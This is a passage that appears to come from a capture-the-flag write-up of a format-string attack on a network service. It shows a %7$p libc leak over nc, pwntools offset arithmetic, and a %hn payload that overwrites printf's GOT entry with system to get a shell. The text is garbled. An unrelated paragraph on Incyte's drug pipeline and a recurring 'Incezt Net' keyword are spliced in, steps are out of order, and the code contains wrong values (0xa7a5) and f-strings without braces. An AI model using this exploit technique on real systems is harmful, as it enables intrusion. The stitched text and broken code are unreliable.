Incezt Net May 2026

We compare the leaked address with known libc offsets (using libc-database or pwntools):

from pwn import *
leak = 0x7ffff7a5d690
# Offsets for libc6_2.31-0ubuntu9.9_amd64 (the version on the host)
puts_offset = 0x0809c0
libc_base = leak - puts_offset
log.info("libc base = %#x", libc_base)

The calculation yields a base address of 0x7ffff7a03000.

Now we can compute the address of system and the string "/bin/sh": incezt net

system_offset = 0x04f440
binsh_offset  = 0x1b3e9a
system_addr   = libc_base + system_offset   # 0x7ffff7a52440
binsh_addr    = libc_base + binsh_offset    # 0x7ffff7b5be9a

We have all we need to get a remote shell.

---

Incyte's portfolio includes:

The company has a robust pipeline of drugs in various stages of development for several indications, including oncology, inflammation, and dermatology.

The program is dynamically linked, so we can leak a libc address from the GOT. The GOT entry for puts is a good target because it’s already resolved. We compare the leaked address with known libc

$ (printf "echo %7$p\n"; cat) | nc challenge.ctf.com 31137
Welcome to Incezt Net!
> %7$p
Result: 0x7ffff7a5d690

The output is a raw pointer printed by the %p format specifier. The exact position (%7$p) was discovered by trial and error (printing %1$p, %2$p, …) until we landed on a pointer that belongs to the libc region (0x7ffff7…).

Result: Leaked address 0x7ffff7a5d690.

from pwn import *
# Target addresses
got_printf = 0x601040
system = 0x7ffff7a52440
# Split into two 2‑byte pieces (little endian)
low  = system & 0xffff          # 0x2440
high = (system >> 16) & 0xffff  # 0xa7a5
# Build the payload
payload  = p64(got_printf)          # will be %8$hn
payload += p64(got_printf + 2)      # will be %9$hn
# Calculate the padding needed (mod 0x10000)
# We start counting from the length of the two addresses (16 bytes)
cur = len(payload)
pad_low  = (low  - cur) % 0x10000
pad_high = (high - (cur + pad_low)) % 0x10000
payload += f"%pad_lowc%8$hn".encode()
payload += f"%pad_highc%9$hn".encode()

The final string is something like (hex‑escaped for clarity):

\x40\x10\x60\x00\x00\x00\x00\x00\x42\x10\x60\x00\x00\x00\x00\x00%5828c%8$hn%17728c%9$hn